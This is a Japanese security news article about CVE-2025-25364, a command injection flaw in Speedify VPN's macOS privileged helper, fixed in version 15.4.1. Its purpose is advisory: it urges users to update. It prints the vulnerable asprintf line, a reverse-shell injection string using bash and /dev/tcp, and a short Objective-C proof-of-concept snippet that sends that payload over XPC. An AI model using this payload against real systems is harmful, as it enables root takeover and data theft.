Speedify VPN の脆弱性 CVE-2025-25364 が FIX:システムの制御奪取の可能性

Speedify VPN Vulnerability on macOS Exposes Users to System Takeover

2025/04/22 gbhackers — macOS 向け Speedify VPN アプリケーションに存在する、深刻なセキュリティ脆弱性 CVE-2025-25364 により、システム全体への侵害のリスクが、数百万のユーザーに対して生じている。この、Speedify の特権ヘルパー・ツールに存在する脆弱性は、SecureLayer7 の研究者たちにより発見された。この脆弱性の悪用に成功したローカルの攻撃者は、任意のコマンドを root 権限で実行し、影響を受けるシステムを完全に制御する可能性を手にする。

CVE-2025-25364:深刻なコマンド・インジェクション脆弱性

この問題の根本的な原因は、”me.connectify.SMJobBlessHelper” XPC サービスに存在する。このヘルパー・ツールは、昇格された root 権限で実行され、Speedify のシステム・レベルにおいてネットワーク操作を実行するものだ。

このサービスは、”/Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper” 経由で特権デーモンとしてインストールされ、Apple の XPC メッセージング・システムを介して、メインの Speedify アプリからコマンドを受信して​​処理するようにコンフィグされている。

AspectDetails
CVE IDCVE-2025-25364
Affected ProductSpeedify VPN
Affected Version15.0.0 (macOS)
Patched Version15.4.1
Componentme.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/)
Vulnerability TypeCommand Injection

最も懸念されるのは、受信 XPC メッセージ内の cmdPath/cmdBin フィールドの入力検証が適切に行われていないことで、ローカルの攻撃者に対して、悪意のペイロード作成が許される可能性である。

これらのフィールドは、サニタイズ処理が行われない状態で、コマンド実行ロジックにダイレクトに埋め込まれているため、攻撃者挿入する任意のシェル・コマンドが、ヘルパー・ツールの root 権限で実行される。

この脆弱性のコアとなるのは、以下の3つの関数である:

  • XPC Message Handler:受信した XPC メッセージを受け入れて解析し、”runSpeedify” リクエストを含むメッセージを検証せずに、起動ハンドラに受け渡す。
  • _handleLaunchSpeedifyMsg:入力データから cmdPath/cmdBin をダイレクトに抽出し、プログラムの実行を開始する。
  • _RunSystemCmd:これらのフィールドからシェル・コマンドを構築し、system() を呼び出して実行する。以下の行が示すのは、このインジェクションのリスクである。

rax = asprintf(&var_38, “codesign -v -R=\”certificate leaf[subject.CN] = \”%s\” and anchor apple generic\” \”%s\””, “…”, rcx);

“; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo” のような文字列を、cmdBin または cmdPath に設定する脅威アクターは、外部サーバへのルート・シェル接続を開くことが可能となる。

XPC API を使用して脆弱なヘルパーに接続し、細工されたペイロードを送信するための、Objective-C で記述された PoC エクスプロイトを、研究者たちが公開している。

そのペイロードにより、root 権限での任意のコード実行がトリガーされ、リバース・シェルの生成などが実施される。関連するスニペットを、以下に示す。

xpc_dictionary_set_string(message, "cmdPath", "/tmp");
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);

この脆弱性の影響は、深刻なものとなる。ローカル・アクセス権を持つ攻撃者は、完全なルート権限の取得/機密ファイルの変更/永続的なマルウェアのインストール/データの窃取といった可能性を手にする。

Speedify VPN ユーザーの多くは、このアプリをプライバシー保護において利用しているため、この脆弱性により、広大なユーザー・ベースのセキュリティが脅かされる可能性がある。

すでに Speedify は、バージョン 15.4.1 をリリースし、この脆弱性に対処している。このバージョンでは、ヘルパー・ツールの完全な書き換えと、より厳格な入力検証に加えて、安全が確保されない XPC 処理が削除されている。Speedify ユーザーに強く推奨されるのは、最新バージョンへと速やかに移行し、このリスクを解消することである。

このインシデントが浮き彫りにするのは、すべての特権コードにおける、厳格な入力検証の重要性である。

macOS 向け Speedify VPN App の脆弱性が FIX とのことですが、すでに PoC エクスプロイトが提供されています。ユーザーの皆さんは、アップデートを忘れないよう、ご注意ください。よろしければ、以下の関連記事も、VPN で検索と併せて ご参照ください。

2025/02/24:VPN の正しい使い方:安全なリモートワーク
2025/02/08:VPN デバイスなどを標的とするブルートフォースが発生
2025/02/01:一般的なユーザー向け Top VPN の選び方